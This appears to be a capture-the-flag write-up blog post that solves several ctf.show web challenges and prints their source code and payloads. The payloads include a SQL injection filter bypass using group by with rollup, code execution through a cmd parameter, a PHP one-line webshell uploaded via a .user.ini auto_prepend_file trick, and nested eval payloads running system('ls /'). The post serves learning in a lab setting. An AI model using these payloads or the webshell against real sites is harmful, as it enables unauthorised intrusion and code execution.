Article directory
ctf.show_web10
Come to the page is a login box
Click the cancel button, the source code appears
<?php
$flag="";
function replaceSpecialChar($strParam){
$regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
return preg_replace($regex,"",$strParam);
}
if (!$con)
{
die('Could not connect: ' . mysqli_error());
}
if(strlen($username)!=strlen(replaceSpecialChar($username))){
die("sql inject error");
}
if(strlen($password)!=strlen(replaceSpecialChar($password))){
die("sql inject error");
}
$sql="select * from user where username = '$username'";
$result=mysqli_query($con,$sql);
if(mysqli_num_rows($result)>0){
while($row=mysqli_fetch_assoc($result)){
if($password==$row['password']){
echo "登陆成功<br>";
echo $flag;
}
}
}
?>
A lot of injection statements have been filtered.
Group by and with rollup are mainly used here to combine
group by, not to mention, it is an arrangement, and the default is ascending order
with rollup (group by can be followed by with rollup, which means that summary statistics are performed again on the basis of group statistics)
There will be an extra line in the result, where the password column is null, and count (*) is the statistical sum.
For example:
select password,count(*) from test group by password with rollup;
So we construct the payload:
username=admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#&password=
Because after adding with rollup, the password has a row of NULL, we only need to enter an empty password to make (NULL==NULL), /**/ is used to bypass the space filter
You can get flag
ctfshow{d89ccf86-5ac9-4429-95e0-ea40b0afba89}
Two, ctf.show_web11
Come to the home page
You can see that the php code has many restrictions.
Notice the way to get the flag $password==$_SESSION['password']
. The password is entered by ourselves. The password in the session is stored locally, so we only need to enter an empty password and delete the local session to successfully bypass it. .
Get flag:
ctfshow{5f4e07ee-e7d9-4302-8b7d-f3eabfa0ed16}
3. ctf.show_web12
Come to the home page
Check out the source code first
There is a prompt cmd variable, indicating that there is likely to be a function of code execution in the background.
Input phpinfo(); view php configuration information
It is found that many command execution methods are disabled.
You can also use highlight_file("index.php"); view the source code
Here is another php function glob();
the glob() function returns the file name or directory that matches the specified pattern.
for example:
glob("*") 匹配任意文件
glob("*.txt")匹配以txt为后缀的文件
With this method, we first find out all the files in the current directory to see if they are available. Input?cmd=print_r(glob(“*”)); print out the following file
and then read the file
?cmd=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');
Get flag:
ctfshow{2eb6ffd3-82c8-4718-a528-9b251e5a31e9}
4. ctf.show_web13
Come to the page
and try to upload the file, but there is no effect, find the hidden directory
Found upload.php, try upload.php.bak to get the source code file
<?php
header("content-type:text/html;charset=utf-8");
$filename = $_FILES['file']['name'];
$temp_name = $_FILES['file']['tmp_name'];
$size = $_FILES['file']['size'];
$error = $_FILES['file']['error'];
$arr = pathinfo($filename);
$ext_suffix = $arr['extension'];
if ($size > 24){
die("error file zise");
}
if (strlen($filename)>9){
die("error file name");
}
if(strlen($ext_suffix)>3){
die("error suffix");
}
if(preg_match("/php/i",$ext_suffix)){
die("error suffix");
}
if(preg_match("/php/i"),$filename)){
die("error file name");
}
if (move_uploaded_file($temp_name, './'.$filename)){
echo "文件上传成功!";
}else{
echo "文件上传失败!";
}
?>
Obtained the source code and found that the size of the restrictive file is <=24, the length of the name is <=9, the length of the suffix is <=3, and the name and suffix cannot have php, so such a Trojan horse can be
constructed
<?php eval($_POST['a']);
Due to the suffix, upload 2.txt first
and then upload the .user.ini file.
The .user.ini in php has the following explanation:
PHP will search for the file name in each directory; if it is set to an empty string, PHP will not search, that is, if the file name is set in .user.ini , then any page will include the contents of the file.
We enter auto_prepend_file = 2.txt in .user.ini, so that all files in this directory will contain the content of 2.txt
//
After the ant sword is connected, we find that there is no permission to operate the file, so we directly enter the web page Look up the flag on.
Submit with POST
a=print_r(glob("*"));
Then use highlight_file() to get the flag
a=highlight_file("文件名");
5. Vegetable Dog Cup
1. Web sign-in
come to the page
the code
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-11-10 17:20:38
# @Last Modified by: h1xa
# @Last Modified time: 2022-11-11 09:38:59
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);
eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]);
I have been trying for a long time, is this really a sign-in question? After reading the big guy's wp, to sum up
the investigation is: the relationship between the request method and the assignment, as well as the Chinese encoding of the Cookie field.
The main reason is the use of the last one-sentence Trojan horse, which has a lot of nesting. Let’s take a look at it:
first, the innermost part is 'CTFshow-QQ group:', and the front is $_COOKIE, that is, the 'CTFshow-QQ group' in the cookie is taken. The value;
then if we pass it in the cookie CTFshow-QQ群:=a
, the one-sentence Trojan horse becomes:
eval($_REQUEST[$_GET[$_POST[a]]][6][0][7][5][8][0][9][4][4]);
Then $_POST[a] is the value of the a parameter to be passed in by POST, we will pass it in a=b
, then it becomes:
eval($_REQUEST[$_GET[b]][6][0][7][5][8][0][9][4][4]);
$_GET[b] is to pass in the value of the b parameter in GET mode, and then assign a value to b b=c
to get:
eval($_REQUEST[c][6][0][7][5][8][0][9][4][4]);
$_REQUEST[c][6][0][7][5][8][0][9][4][4]
, which $_REQUEST
can be requested in any way, c is an array, and the value passed in the $_REQUEST request is [6][0][7][5][8][0][9][4][4]
the value of the ID key in the C array. Because PHP arrays can assign values to ID keys.
Then we can directly assign values to these keys in the C array:
c[6][0][7][5][8][0][9][4][4]= system('ls /');
So we use the POST form to send the package, and pay attention “群”
to use url encoding %E7%BE%A4
, otherwise burp will not recognize it (when assigning a value to c, it can be placed in the request header or in the request entity, because the request request method can be in the form of get or post. accept)
Here I use hackbar conveniently,
so we get the flagaaa file, enter the command cat /f1agaaa
to get the flag
and gain a lot
2.web2 c0me_t0_s1gn
When I came to the page
, I was prompted that there was information to be found. I tried to use Yujian and dirsearch to find the directory, but I couldn’t find it. I saw the source code of the page later. I saw
some information about the flag, and followed the specific prompt to the console. It prompted
the operation method to find the flag, and
found it after running. The information in the second half of the flag can be spliced.
3. I only have $ in my eyes
come to the page
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-11-10 17:20:38
# @Last Modified by: h1xa
# @Last Modified time: 2022-11-11 08:21:54
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
extract($_POST);
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
highlight_file(__FILE__);
You can see that the post method is used to pass in parameters. Here we are examining the nesting of variables, a series of $
variables, the initial variable should be _
, so we need to define the variables in turn, and assign them to the command execution statement after doing it, system('ls /');
and the variables cannot be repeated
Not very good at writing scripts, refer to the big guy
_=a&a=b&b=c&c=d&d=e&e=f&f=g&g=h&h=i&i=j&j=k&k=l&l=m&m=n&n=o&o=p&p=q&q=r&r=s&s=t&t=u&u=v&v=w&w=x&x=y&y=z&z=A&A=B&B=C&C=D&D=E&E=F&F=G&G=H&H=I&I=system('ls /')
Modify the command to get the flag
Summarize
Follow-up will continue to share ctfshow notes